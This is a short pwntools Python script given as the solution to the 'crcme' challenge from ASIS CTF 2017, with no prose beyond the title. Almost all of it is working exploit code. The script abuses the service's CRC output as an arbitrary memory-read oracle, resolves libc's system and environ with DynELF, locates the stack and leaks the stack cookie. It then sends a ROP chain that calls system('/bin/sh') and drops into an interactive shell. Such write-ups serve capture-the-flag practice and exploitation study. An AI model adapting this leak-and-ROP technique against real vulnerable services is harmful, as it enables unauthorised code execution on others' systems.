Solution to CRC problem from asis ctf 2017

doit.py

from pwn import *

s = log.waitfor("Calculating CRC reverse lookup table")
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
s.success()

e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")

@MemLeak
def leak(addr):
    f = 0
    if "\n" in p32(addr):
        log.info("Leaking address with newline: 0x%x", addr)
        addr -= 1
        f = 1
    #Choice:
    r.sendline("1")
    #What is the length of your data:
    r.sendline("2")
    #Please send me 1 bytes to process:
    r.sendline("/bin/sh\x00".ljust(100, "A") + p32(addr))
    r.recvuntil("CRC is: ")
    crc = int(r.recvline(), 16)
    return reverse_crc[crc][f:]

d = DynELF(leak, elf=e)

system = d.lookup("system", lib="libc.so")
log.info("system = 0x%x", system)

environ = d.lookup("environ", lib="libc.so")
log.info("environ = 0x%x", environ)

stack = leak.d(environ)
for i in range(0x400):
    if leak.d(stack-i) == 0x41414141: break
stack = stack - i
log.info("stack = 0x%x", stack)

cookie = leak.d(stack+8)
log.info("cookie = 0x%x", cookie)

binsh = stack-100+4

rop = flat(["A"*40, cookie, "B"*12, system, 0x41414141, binsh])

assert "\n" not in rop

r.sendline(rop)
r.sendline("echo SHELL")
r.recvuntil("SHELL\n")

r.interactive()